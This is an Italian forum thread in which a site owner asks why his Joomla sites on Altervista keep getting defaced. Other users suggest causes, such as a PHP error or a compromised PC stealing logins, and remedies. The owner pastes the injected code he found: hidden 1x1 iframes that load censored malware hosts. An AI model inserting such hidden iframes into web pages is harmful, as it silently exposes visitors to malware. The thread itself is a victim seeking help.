Defacing 3 siti

Printable View

27-01-2011, 13.39.53
Ufobm

Defacing 3 siti

Ciao!
Tempo fa tre miei siti ospitati su Altervista creati con il CMS Joomla sono stati defacciati. Non essendo siti molto importanti per me ho provveduto a ripararli con molta calma.
Tuttavia nonostante io abbia aggiornato tutto all'ultima versione, il problema si è ripresentato.

In particolare, stavo creando un sito di prova all'indirizzo:
http://joomlalabs.altervista.org/

Avrò installato Joomla al massimo 2 settimane fa. Ho usato l'ultima versione stabile, la 1522. Ho installato un template personalizzato:
http://www.joomla.it/template/elenco...53-bursst.html

A cui ho apportato alcune modifiche. Inoltre ho installato (solo ieri) un paio di plugin. Tuttavia gli altri siti defacciati non avevano alcun plugin installato.

Come è possibile che io abbia subito tutti questi attacchi? Come posso proteggermi da attacchi futuri? Potrebbe esserci una debolezza di Altervista?

Grazie.
27-01-2011, 16.07.05

per "defacciato" intendi la scritta Parse error: syntax error, unexpected '<' in /membri/joomlalabs/index.php on line 88? quello è semplicemente un errore php ciò vuol dire che o hai messo le mani nel codice o c è qualche plugin che non funziona correttamente se la risposta è la prima penso che l'errore (nella linea 88) sia un errore di distrazione per esempio non aver scritto echo scrivendo un tag html mentre si scrive dentro i tag <?php e ?>.. se è la seconda prova a disattivare i plugin e attivarne uno ad uno finchè non trovi chi dà questo errore
27-01-2011, 22.11.52
Ufobm

Ciao!
Grazie per la risposta! Purtroppo però si tratta proprio di defacing. Il fatto è che non è riuscito bene. Ma guardando il codice si notano cose del genere:

Codice:

echo JResponse::toString($mainframe->getCfg('gzip'));<html><body><iframe src="http://xxx.yy/" width="1" height="1" frameborder="0"></iframe><iframe src='http://xxx2.yy/' width=1 height=1 style='visibility:hidden;'></iframe><iframe src='http://xxx3.yy/' width=1 height=1 style='visibility:hidden;'></iframe></body></html>

Dove chiaramenti i link (che ho "censurato") portano a siti contenenti virus, malwares, trojan ecc.
27-01-2011, 22.19.23
darkwolf

Ufobm: considerando il tipo di attacco, non sembrerebbe un daface manuale.
È possibile che il tuo pc sia compromesso e che ci sia un qualche virus/malware/worm, capace di grabbare i dati di login e infettare i tuoi siti.

Dovresti assicurarti che l'OS sia integro (combofix + spybot + scansione con un buon antivirus); cambiare i dati di login dei tuoi siti; mettere in sicurezza gli script usati (aggiornare alle ultime versioni; assicurarsi non ci siano backdoor nascoste).